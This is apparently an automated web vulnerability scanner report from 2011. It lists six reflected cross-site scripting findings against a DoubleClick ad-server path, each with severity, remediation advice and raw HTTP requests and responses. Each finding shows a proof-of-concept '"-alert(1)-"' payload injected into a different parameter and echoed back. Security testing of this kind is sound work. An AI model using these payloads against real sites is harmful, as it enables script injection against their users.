In most situations where user-controllable data is copied into application responses, cross-site scripting attacks can be prevented using two layers of defenses:In cases where the application's functionality allows users to author content using a restricted subset of HTML tags and attributes (for example, blog comments which allow limited formatting and linking), it is necessary to parse the supplied HTML to validate that it does not use any dangerous syntax; this is a non-trivial task.


4.1. http://ad-emea.doubleclick.net/adi/N5506.150290.INVITEMEDIA/B5070033 [campID parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad-emea.doubleclick.net
Path:   /adi/N5506.150290.INVITEMEDIA/B5070033

Issue detail

The value of the campID request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 5e9c8"-alert(1)-"ed8d98066a7 was submitted in the campID parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /adi/N5506.150290.INVITEMEDIA/B5070033;sz=300x250;click=http://ad.thewheelof.com/clk?2,13%3B6423724ab7691482%3B12de6f2f4b2,0%3B%3B%3B932760147,NwQAAD4rFgAptXQAAAAAACzLHQAAAAAAAgAQAAIAAAAAAP8AAAAECkpVJAAAAAAA5-4WAAAAAABeUicAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAADQPQ4AAAAAAAIAAwAAAAAAsfTy5i0BAAAAAAAAADg0OTk2MjA4LTJlZGYtMTFlMC1iOTdkLTAwMzA0OGQ2ZDg5MAAzmSoAAAA=,,http%3A%2F%2Fad.doubleclick.net%2Fadi%2Fdmd.ehow%2Fhomepage%3Bvid%3D0%3Bugc%3D0%3Blvl%3D4%3Bsz%3D300x250%3Brsi%3D%3Btile%3D2%3Bord%3D8766312252264%3F,$http://t.invitemedia.com/track_click?auctionID=12966598381452862-73583&campID=527545e9c8"-alert(1)-"ed8d98066a7&crID=73583&pubICode=1502951&pub=58661&partnerID=219&url=http%3A%2F%2Fad%2Edoubleclick%2Enet%2Fadi%2Fdmd%2Eehow%2Fhomepage%3Bvid%3D0%3Bugc%3D0%3Blvl%3D4%3Bsz%3D300x250%3Brsi%3D%3Btile%3D2%3Bord%3D8766312252264%3F&redirectURL=;ord=1296659838? HTTP/1.1
Host: ad-emea.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://ad.yieldmanager.com/iframe3?NwQAAD4rFgAptXQAAAAAACzLHQAAAAAAAgAQAAIAAAAAAP8AAAAECkpVJAAAAAAA5-4WAAAAAABeUicAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAADQPQ4AAAAAAAIAAwAAAAAAAABggqpA1D8AAJD6T6fUPwAAYIKqQNQ.AACQ-k-n1D9HfacomovVPwAA4OnM-NU.AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAADjya-s.FmSCZIMRPBESjaXH5pC98tmCtRtuX5jAAAAAA==,,http%3A%2F%2Fad.doubleclick.net%2Fadi%2Fdmd.ehow%2Fhomepage%3Bvid%3D0%3Bugc%3D0%3Blvl%3D4%3Bsz%3D300x250%3Brsi%3D%3Btile%3D2%3Bord%3D8766312252264%3F,Z%3D300x250%26click%3Dhttp%253a%252f%252fad.doubleclick.net%252fclick%253Bh%253Dv8%252f3aa2%252f3%252f0%252f%252a%252fn%253B228957569%253B0%252d0%253B0%253B45421688%253B4307%252d300%252f250%253B38375088%252f38392845%252f1%253B%253B%257Eaopt%253D2%252f0%252f36%252f0%253B%257Esscs%253D%253f%26e%3D58661%26S%3D%26I%3Dhomepage%26_salt%3D1109920069%26B%3D10%26r%3D0,84996208-2edf-11e0-b97d-003048d6d890
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=c653243310000d9||t=1294099968|et=730|cs=gfdmbifc

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: text/html
Date: Wed, 02 Feb 2011 15:31:40 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 8925

<html><head><title>Advertisement</title></head><body bgcolor=#ffffff marginwidth=0 marginheight=0 leftmargin=0 topmargin=0><!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserve
...[SNIP]...
Fadi%2Fdmd.ehow%2Fhomepage%3Bvid%3D0%3Bugc%3D0%3Blvl%3D4%3Bsz%3D300x250%3Brsi%3D%3Btile%3D2%3Bord%3D8766312252264%3F,$http://t.invitemedia.com/track_click?auctionID=12966598381452862-73583&campID=527545e9c8"-alert(1)-"ed8d98066a7&crID=73583&pubICode=1502951&pub=58661&partnerID=219&url=http%3A%2F%2Fad%2Edoubleclick%2Enet%2Fadi%2Fdmd%2Eehow%2Fhomepage%3Bvid%3D0%3Bugc%3D0%3Blvl%3D4%3Bsz%3D300x250%3Brsi%3D%3Btile%3D2%3Bord%3D87663
...[SNIP]...

4.2. http://ad-emea.doubleclick.net/adi/N5506.150290.INVITEMEDIA/B5070033 [crID parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad-emea.doubleclick.net
Path:   /adi/N5506.150290.INVITEMEDIA/B5070033

Issue detail

The value of the crID request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 59e74"-alert(1)-"6726dbbe500 was submitted in the crID parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /adi/N5506.150290.INVITEMEDIA/B5070033;sz=300x250;click=http://ad.thewheelof.com/clk?2,13%3B6423724ab7691482%3B12de6f2f4b2,0%3B%3B%3B932760147,NwQAAD4rFgAptXQAAAAAACzLHQAAAAAAAgAQAAIAAAAAAP8AAAAECkpVJAAAAAAA5-4WAAAAAABeUicAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAADQPQ4AAAAAAAIAAwAAAAAAsfTy5i0BAAAAAAAAADg0OTk2MjA4LTJlZGYtMTFlMC1iOTdkLTAwMzA0OGQ2ZDg5MAAzmSoAAAA=,,http%3A%2F%2Fad.doubleclick.net%2Fadi%2Fdmd.ehow%2Fhomepage%3Bvid%3D0%3Bugc%3D0%3Blvl%3D4%3Bsz%3D300x250%3Brsi%3D%3Btile%3D2%3Bord%3D8766312252264%3F,$http://t.invitemedia.com/track_click?auctionID=12966598381452862-73583&campID=52754&crID=7358359e74"-alert(1)-"6726dbbe500&pubICode=1502951&pub=58661&partnerID=219&url=http%3A%2F%2Fad%2Edoubleclick%2Enet%2Fadi%2Fdmd%2Eehow%2Fhomepage%3Bvid%3D0%3Bugc%3D0%3Blvl%3D4%3Bsz%3D300x250%3Brsi%3D%3Btile%3D2%3Bord%3D8766312252264%3F&redirectURL=;ord=1296659838? HTTP/1.1
Host: ad-emea.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://ad.yieldmanager.com/iframe3?NwQAAD4rFgAptXQAAAAAACzLHQAAAAAAAgAQAAIAAAAAAP8AAAAECkpVJAAAAAAA5-4WAAAAAABeUicAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAADQPQ4AAAAAAAIAAwAAAAAAAABggqpA1D8AAJD6T6fUPwAAYIKqQNQ.AACQ-k-n1D9HfacomovVPwAA4OnM-NU.AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAADjya-s.FmSCZIMRPBESjaXH5pC98tmCtRtuX5jAAAAAA==,,http%3A%2F%2Fad.doubleclick.net%2Fadi%2Fdmd.ehow%2Fhomepage%3Bvid%3D0%3Bugc%3D0%3Blvl%3D4%3Bsz%3D300x250%3Brsi%3D%3Btile%3D2%3Bord%3D8766312252264%3F,Z%3D300x250%26click%3Dhttp%253a%252f%252fad.doubleclick.net%252fclick%253Bh%253Dv8%252f3aa2%252f3%252f0%252f%252a%252fn%253B228957569%253B0%252d0%253B0%253B45421688%253B4307%252d300%252f250%253B38375088%252f38392845%252f1%253B%253B%257Eaopt%253D2%252f0%252f36%252f0%253B%257Esscs%253D%253f%26e%3D58661%26S%3D%26I%3Dhomepage%26_salt%3D1109920069%26B%3D10%26r%3D0,84996208-2edf-11e0-b97d-003048d6d890
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=c653243310000d9||t=1294099968|et=730|cs=gfdmbifc

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: text/html
Date: Wed, 02 Feb 2011 15:31:59 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 8982

<html><head><title>Advertisement</title></head><body bgcolor=#ffffff marginwidth=0 marginheight=0 leftmargin=0 topmargin=0><!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserve
...[SNIP]...
ehow%2Fhomepage%3Bvid%3D0%3Bugc%3D0%3Blvl%3D4%3Bsz%3D300x250%3Brsi%3D%3Btile%3D2%3Bord%3D8766312252264%3F,$http://t.invitemedia.com/track_click?auctionID=12966598381452862-73583&campID=52754&crID=7358359e74"-alert(1)-"6726dbbe500&pubICode=1502951&pub=58661&partnerID=219&url=http%3A%2F%2Fad%2Edoubleclick%2Enet%2Fadi%2Fdmd%2Eehow%2Fhomepage%3Bvid%3D0%3Bugc%3D0%3Blvl%3D4%3Bsz%3D300x250%3Brsi%3D%3Btile%3D2%3Bord%3D8766312252264%3F
...[SNIP]...

4.3. http://ad-emea.doubleclick.net/adi/N5506.150290.INVITEMEDIA/B5070033 [partnerID parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad-emea.doubleclick.net
Path:   /adi/N5506.150290.INVITEMEDIA/B5070033

Issue detail

The value of the partnerID request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 112f0"-alert(1)-"3c37d85996f was submitted in the partnerID parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /adi/N5506.150290.INVITEMEDIA/B5070033;sz=300x250;click=http://ad.thewheelof.com/clk?2,13%3B6423724ab7691482%3B12de6f2f4b2,0%3B%3B%3B932760147,NwQAAD4rFgAptXQAAAAAACzLHQAAAAAAAgAQAAIAAAAAAP8AAAAECkpVJAAAAAAA5-4WAAAAAABeUicAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAADQPQ4AAAAAAAIAAwAAAAAAsfTy5i0BAAAAAAAAADg0OTk2MjA4LTJlZGYtMTFlMC1iOTdkLTAwMzA0OGQ2ZDg5MAAzmSoAAAA=,,http%3A%2F%2Fad.doubleclick.net%2Fadi%2Fdmd.ehow%2Fhomepage%3Bvid%3D0%3Bugc%3D0%3Blvl%3D4%3Bsz%3D300x250%3Brsi%3D%3Btile%3D2%3Bord%3D8766312252264%3F,$http://t.invitemedia.com/track_click?auctionID=12966598381452862-73583&campID=52754&crID=73583&pubICode=1502951&pub=58661&partnerID=219112f0"-alert(1)-"3c37d85996f&url=http%3A%2F%2Fad%2Edoubleclick%2Enet%2Fadi%2Fdmd%2Eehow%2Fhomepage%3Bvid%3D0%3Bugc%3D0%3Blvl%3D4%3Bsz%3D300x250%3Brsi%3D%3Btile%3D2%3Bord%3D8766312252264%3F&redirectURL=;ord=1296659838? HTTP/1.1
Host: ad-emea.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://ad.yieldmanager.com/iframe3?NwQAAD4rFgAptXQAAAAAACzLHQAAAAAAAgAQAAIAAAAAAP8AAAAECkpVJAAAAAAA5-4WAAAAAABeUicAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAADQPQ4AAAAAAAIAAwAAAAAAAABggqpA1D8AAJD6T6fUPwAAYIKqQNQ.AACQ-k-n1D9HfacomovVPwAA4OnM-NU.AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAADjya-s.FmSCZIMRPBESjaXH5pC98tmCtRtuX5jAAAAAA==,,http%3A%2F%2Fad.doubleclick.net%2Fadi%2Fdmd.ehow%2Fhomepage%3Bvid%3D0%3Bugc%3D0%3Blvl%3D4%3Bsz%3D300x250%3Brsi%3D%3Btile%3D2%3Bord%3D8766312252264%3F,Z%3D300x250%26click%3Dhttp%253a%252f%252fad.doubleclick.net%252fclick%253Bh%253Dv8%252f3aa2%252f3%252f0%252f%252a%252fn%253B228957569%253B0%252d0%253B0%253B45421688%253B4307%252d300%252f250%253B38375088%252f38392845%252f1%253B%253B%257Eaopt%253D2%252f0%252f36%252f0%253B%257Esscs%253D%253f%26e%3D58661%26S%3D%26I%3Dhomepage%26_salt%3D1109920069%26B%3D10%26r%3D0,84996208-2edf-11e0-b97d-003048d6d890
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=c653243310000d9||t=1294099968|et=730|cs=gfdmbifc

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: text/html
Date: Wed, 02 Feb 2011 15:32:59 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 8953

<html><head><title>Advertisement</title></head><body bgcolor=#ffffff marginwidth=0 marginheight=0 leftmargin=0 topmargin=0><!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserve
...[SNIP]...
%3D4%3Bsz%3D300x250%3Brsi%3D%3Btile%3D2%3Bord%3D8766312252264%3F,$http://t.invitemedia.com/track_click?auctionID=12966598381452862-73583&campID=52754&crID=73583&pubICode=1502951&pub=58661&partnerID=219112f0"-alert(1)-"3c37d85996f&url=http%3A%2F%2Fad%2Edoubleclick%2Enet%2Fadi%2Fdmd%2Eehow%2Fhomepage%3Bvid%3D0%3Bugc%3D0%3Blvl%3D4%3Bsz%3D300x250%3Brsi%3D%3Btile%3D2%3Bord%3D8766312252264%3F&redirectURL=http%3a%2f%2ffree.turbotax.c
...[SNIP]...

4.4. http://ad-emea.doubleclick.net/adi/N5506.150290.INVITEMEDIA/B5070033 [pub parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad-emea.doubleclick.net
Path:   /adi/N5506.150290.INVITEMEDIA/B5070033

Issue detail

The value of the pub request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 1d3b8"-alert(1)-"ad6539c90a was submitted in the pub parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /adi/N5506.150290.INVITEMEDIA/B5070033;sz=300x250;click=http://ad.thewheelof.com/clk?2,13%3B6423724ab7691482%3B12de6f2f4b2,0%3B%3B%3B932760147,NwQAAD4rFgAptXQAAAAAACzLHQAAAAAAAgAQAAIAAAAAAP8AAAAECkpVJAAAAAAA5-4WAAAAAABeUicAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAADQPQ4AAAAAAAIAAwAAAAAAsfTy5i0BAAAAAAAAADg0OTk2MjA4LTJlZGYtMTFlMC1iOTdkLTAwMzA0OGQ2ZDg5MAAzmSoAAAA=,,http%3A%2F%2Fad.doubleclick.net%2Fadi%2Fdmd.ehow%2Fhomepage%3Bvid%3D0%3Bugc%3D0%3Blvl%3D4%3Bsz%3D300x250%3Brsi%3D%3Btile%3D2%3Bord%3D8766312252264%3F,$http://t.invitemedia.com/track_click?auctionID=12966598381452862-73583&campID=52754&crID=73583&pubICode=1502951&pub=586611d3b8"-alert(1)-"ad6539c90a&partnerID=219&url=http%3A%2F%2Fad%2Edoubleclick%2Enet%2Fadi%2Fdmd%2Eehow%2Fhomepage%3Bvid%3D0%3Bugc%3D0%3Blvl%3D4%3Bsz%3D300x250%3Brsi%3D%3Btile%3D2%3Bord%3D8766312252264%3F&redirectURL=;ord=1296659838? HTTP/1.1
Host: ad-emea.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://ad.yieldmanager.com/iframe3?NwQAAD4rFgAptXQAAAAAACzLHQAAAAAAAgAQAAIAAAAAAP8AAAAECkpVJAAAAAAA5-4WAAAAAABeUicAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAADQPQ4AAAAAAAIAAwAAAAAAAABggqpA1D8AAJD6T6fUPwAAYIKqQNQ.AACQ-k-n1D9HfacomovVPwAA4OnM-NU.AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAADjya-s.FmSCZIMRPBESjaXH5pC98tmCtRtuX5jAAAAAA==,,http%3A%2F%2Fad.doubleclick.net%2Fadi%2Fdmd.ehow%2Fhomepage%3Bvid%3D0%3Bugc%3D0%3Blvl%3D4%3Bsz%3D300x250%3Brsi%3D%3Btile%3D2%3Bord%3D8766312252264%3F,Z%3D300x250%26click%3Dhttp%253a%252f%252fad.doubleclick.net%252fclick%253Bh%253Dv8%252f3aa2%252f3%252f0%252f%252a%252fn%253B228957569%253B0%252d0%253B0%253B45421688%253B4307%252d300%252f250%253B38375088%252f38392845%252f1%253B%253B%257Eaopt%253D2%252f0%252f36%252f0%253B%257Esscs%253D%253f%26e%3D58661%26S%3D%26I%3Dhomepage%26_salt%3D1109920069%26B%3D10%26r%3D0,84996208-2edf-11e0-b97d-003048d6d890
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=c653243310000d9||t=1294099968|et=730|cs=gfdmbifc

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: text/html
Date: Wed, 02 Feb 2011 15:32:39 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 8942

<html><head><title>Advertisement</title></head><body bgcolor=#ffffff marginwidth=0 marginheight=0 leftmargin=0 topmargin=0><!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserve
...[SNIP]...
Bugc%3D0%3Blvl%3D4%3Bsz%3D300x250%3Brsi%3D%3Btile%3D2%3Bord%3D8766312252264%3F,$http://t.invitemedia.com/track_click?auctionID=12966598381452862-73583&campID=52754&crID=73583&pubICode=1502951&pub=586611d3b8"-alert(1)-"ad6539c90a&partnerID=219&url=http%3A%2F%2Fad%2Edoubleclick%2Enet%2Fadi%2Fdmd%2Eehow%2Fhomepage%3Bvid%3D0%3Bugc%3D0%3Blvl%3D4%3Bsz%3D300x250%3Brsi%3D%3Btile%3D2%3Bord%3D8766312252264%3F&redirectURL=http%3a%2f%2fl
...[SNIP]...

4.5. http://ad-emea.doubleclick.net/adi/N5506.150290.INVITEMEDIA/B5070033 [pubICode parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad-emea.doubleclick.net
Path:   /adi/N5506.150290.INVITEMEDIA/B5070033

Issue detail

The value of the pubICode request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 8b3b5"-alert(1)-"6e28e40048e was submitted in the pubICode parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /adi/N5506.150290.INVITEMEDIA/B5070033;sz=300x250;click=http://ad.thewheelof.com/clk?2,13%3B6423724ab7691482%3B12de6f2f4b2,0%3B%3B%3B932760147,NwQAAD4rFgAptXQAAAAAACzLHQAAAAAAAgAQAAIAAAAAAP8AAAAECkpVJAAAAAAA5-4WAAAAAABeUicAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAADQPQ4AAAAAAAIAAwAAAAAAsfTy5i0BAAAAAAAAADg0OTk2MjA4LTJlZGYtMTFlMC1iOTdkLTAwMzA0OGQ2ZDg5MAAzmSoAAAA=,,http%3A%2F%2Fad.doubleclick.net%2Fadi%2Fdmd.ehow%2Fhomepage%3Bvid%3D0%3Bugc%3D0%3Blvl%3D4%3Bsz%3D300x250%3Brsi%3D%3Btile%3D2%3Bord%3D8766312252264%3F,$http://t.invitemedia.com/track_click?auctionID=12966598381452862-73583&campID=52754&crID=73583&pubICode=15029518b3b5"-alert(1)-"6e28e40048e&pub=58661&partnerID=219&url=http%3A%2F%2Fad%2Edoubleclick%2Enet%2Fadi%2Fdmd%2Eehow%2Fhomepage%3Bvid%3D0%3Bugc%3D0%3Blvl%3D4%3Bsz%3D300x250%3Brsi%3D%3Btile%3D2%3Bord%3D8766312252264%3F&redirectURL=;ord=1296659838? HTTP/1.1
Host: ad-emea.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://ad.yieldmanager.com/iframe3?NwQAAD4rFgAptXQAAAAAACzLHQAAAAAAAgAQAAIAAAAAAP8AAAAECkpVJAAAAAAA5-4WAAAAAABeUicAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAADQPQ4AAAAAAAIAAwAAAAAAAABggqpA1D8AAJD6T6fUPwAAYIKqQNQ.AACQ-k-n1D9HfacomovVPwAA4OnM-NU.AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAADjya-s.FmSCZIMRPBESjaXH5pC98tmCtRtuX5jAAAAAA==,,http%3A%2F%2Fad.doubleclick.net%2Fadi%2Fdmd.ehow%2Fhomepage%3Bvid%3D0%3Bugc%3D0%3Blvl%3D4%3Bsz%3D300x250%3Brsi%3D%3Btile%3D2%3Bord%3D8766312252264%3F,Z%3D300x250%26click%3Dhttp%253a%252f%252fad.doubleclick.net%252fclick%253Bh%253Dv8%252f3aa2%252f3%252f0%252f%252a%252fn%253B228957569%253B0%252d0%253B0%253B45421688%253B4307%252d300%252f250%253B38375088%252f38392845%252f1%253B%253B%257Eaopt%253D2%252f0%252f36%252f0%253B%257Esscs%253D%253f%26e%3D58661%26S%3D%26I%3Dhomepage%26_salt%3D1109920069%26B%3D10%26r%3D0,84996208-2edf-11e0-b97d-003048d6d890
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=c653243310000d9||t=1294099968|et=730|cs=gfdmbifc

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: text/html
Date: Wed, 02 Feb 2011 15:32:20 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 8953

<html><head><title>Advertisement</title></head><body bgcolor=#ffffff marginwidth=0 marginheight=0 leftmargin=0 topmargin=0><!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserve
...[SNIP]...
Bvid%3D0%3Bugc%3D0%3Blvl%3D4%3Bsz%3D300x250%3Brsi%3D%3Btile%3D2%3Bord%3D8766312252264%3F,$http://t.invitemedia.com/track_click?auctionID=12966598381452862-73583&campID=52754&crID=73583&pubICode=15029518b3b5"-alert(1)-"6e28e40048e&pub=58661&partnerID=219&url=http%3A%2F%2Fad%2Edoubleclick%2Enet%2Fadi%2Fdmd%2Eehow%2Fhomepage%3Bvid%3D0%3Bugc%3D0%3Blvl%3D4%3Bsz%3D300x250%3Brsi%3D%3Btile%3D2%3Bord%3D8766312252264%3F&redirectURL=http
...[SNIP]...

4.6. http://ad-emea.doubleclick.net/adi/N5506.150290.INVITEMEDIA/B5070033 [sz parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad-emea.doubleclick.net
Path:   /adi/N5506.150290.INVITEMEDIA/B5070033

Issue detail

The value of the sz request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload ddba6"-alert(1)-"6c8bf62d897 was submitted in the sz parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /adi/N5506.150290.INVITEMEDIA/B5070033;sz=300x250;click=http://ad.thewheelof.com/clk?2,13%3B6423724ab7691482%3B12de6f2f4b2,0%3B%3B%3B932760147,NwQAAD4rFgAptXQAAAAAACzLHQAAAAAAAgAQAAIAAAAAAP8AAAAECkpVJAAAAAAA5-4WAAAAAABeUicAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAADQPQ4AAAAAAAIAAwAAAAAAsfTy5i0BAAAAAAAAADg0OTk2MjA4LTJlZGYtMTFlMC1iOTdkLTAwMzA0OGQ2ZDg5MAAzmSoAAAA=,,http%3A%2F%2Fad.doubleclick.net%2Fadi%2Fdmd.ehow%2Fhomepage%3Bvid%3D0%3Bugc%3D0%3Blvl%3D4%3Bsz%3D300x250%3Brsi%3D%3Btile%3D2%3Bord%3D8766312252264%3F,$http://t.invitemedia.com/track_click?auctionID=12966598381452862-73583ddba6"-alert(1)-"6c8bf62d897&campID=52754&crID=73583&pubICode=1502951&pub=58661&partnerID=219&url=http%3A%2F%2Fad%2Edoubleclick%2Enet%2Fadi%2Fdmd%2Eehow%2Fhomepage%3Bvid%3D0%3Bugc%3D0%3Blvl%3D4%3Bsz%3D300x250%3Brsi%3D%3Btile%3D2%3Bord%3D8766312252264%3F&redirectURL=;ord=1296659838? HTTP/1.1
Host: ad-emea.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://ad.yieldmanager.com/iframe3?NwQAAD4rFgAptXQAAAAAACzLHQAAAAAAAgAQAAIAAAAAAP8AAAAECkpVJAAAAAAA5-4WAAAAAABeUicAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAADQPQ4AAAAAAAIAAwAAAAAAAABggqpA1D8AAJD6T6fUPwAAYIKqQNQ.AACQ-k-n1D9HfacomovVPwAA4OnM-NU.AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAADjya-s.FmSCZIMRPBESjaXH5pC98tmCtRtuX5jAAAAAA==,,http%3A%2F%2Fad.doubleclick.net%2Fadi%2Fdmd.ehow%2Fhomepage%3Bvid%3D0%3Bugc%3D0%3Blvl%3D4%3Bsz%3D300x250%3Brsi%3D%3Btile%3D2%3Bord%3D8766312252264%3F,Z%3D300x250%26click%3Dhttp%253a%252f%252fad.doubleclick.net%252fclick%253Bh%253Dv8%252f3aa2%252f3%252f0%252f%252a%252fn%253B228957569%253B0%252d0%253B0%253B45421688%253B4307%252d300%252f250%253B38375088%252f38392845%252f1%253B%253B%257Eaopt%253D2%252f0%252f36%252f0%253B%257Esscs%253D%253f%26e%3D58661%26S%3D%26I%3Dhomepage%26_salt%3D1109920069%26B%3D10%26r%3D0,84996208-2edf-11e0-b97d-003048d6d890
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=c653243310000d9||t=1294099968|et=730|cs=gfdmbifc

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: text/html
Date: Wed, 02 Feb 2011 15:31:20 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 8941

<html><head><title>Advertisement</title></head><body bgcolor=#ffffff marginwidth=0 marginheight=0 leftmargin=0 topmargin=0><!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserve
...[SNIP]...
